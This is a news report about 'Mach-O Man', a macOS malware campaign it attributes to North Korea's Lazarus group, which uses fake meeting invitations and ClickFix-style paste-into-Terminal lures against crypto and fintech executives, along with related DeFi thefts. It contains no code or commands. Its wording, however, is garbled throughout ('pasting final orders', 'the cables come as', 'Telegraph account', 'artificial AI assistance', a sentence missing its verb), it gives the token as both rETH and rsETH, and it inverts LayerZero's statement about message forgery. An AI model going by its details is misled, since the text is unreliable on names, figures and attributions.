North Korean group Lazarus targets crypto operations with new macOS malware
North Korean group Lazarus is using the “Mach-O Man” MacOS malware and fake meeting invitations to hijack crypto leaders and sponsor a nine-person DeFi attack.
Summary
- CertiK is flagging as “Mach-O Man,” a Lazarus-built toolkit for macOS that hits crypto and fintech executives.
- The campaign uses fake ClickFix-style meeting invitations to trick victims into pasting final orders.
- Researchers linked Lazarus to more than $500 million stolen from Drift and KelpDAO in recent DeFi raids.
Lazarus, a North Korean government-backed hacking outfit, has launched a new macOS campaign aimed at fintech and crypto executives, according to blockchain security firm CertiK.
The operation, called “Mach-O Man,” combines social engineering and terminal-level payloads to steal sensitive company and crypto data while leaving nothing on disk.
CertiK investigators say the campaign relies on the ClickFix tactic, where victims are lured into pasting commands that look like “fix” or “verify” directly into the macOS Terminal during a fake support or meeting flow. In this case, the cables come as bogus Internet meeting invitations that “trick victims into pasting malicious repair commands into Mac terminals,” with the toolkit automatically deleting after use to frustrate forensics, CertiK’s analysis noted.
According to threat intelligence firm SOC Prime, the “Mach-O Man” draft is tied to Lazarus’ Famous Chollima’s wing and is being distributed through compromised Telegram accounts and fake meeting invitations targeting crypto and financial organizations. The toolkit, according to CoinDesk, includes a Mach-O binary designed to profile a host, establish persistence, and extract information and browser data using Telegram-based command and control.
Google Cloud’s Mandiant previously described similar campaigns for macOS that mix ClickFix with AI-assisted video deepfakes, fake Zoom calls, and hacked messaging accounts to nudge targets into making vague commands.
“The campaign used a compromised Telegraph account, a fake Zoom meeting, and artificial AI assistance to trick victims into issuing commands that lead to a series of macOS infections,” Mandiant researchers wrote.
CertiK researcher, Natalie Newson, linked the latest “Mach-O Man” wave to Lazarus’ extensive push that has seen more than $500 million in DeFi platforms Drift and KelpDAO in just over two weeks.
In those incidents, Lazaru allegedly combined social engineering against the trading firm with a sophisticated cross-chain exploit that allowed the attackers to spend approximately 116,500 rETH and withdraw approximately $292 million.
LayerZero, which provides the bridge infrastructure used by KelpDAO, said North Korea’s Lazarus Group “may be the player” behind the rsETH exploit and blamed the single-point authentication design for failing to enable cross-chain message forgery.
“Lazarus has been targeting the cryptocurrency ecosystem for years, stealing nearly $2 billion in virtual assets in 2023 and 2024,” security outlet SecurityWeek said, citing previous campaigns powered by ClickFix.
With DeFi already suffering what research outlets are calling its worst month ever for hacks, markets are now effectively predicting another $100 million-plus exploit this year, underscoring how state-linked attackers like Lazarus have become a crypto threat.
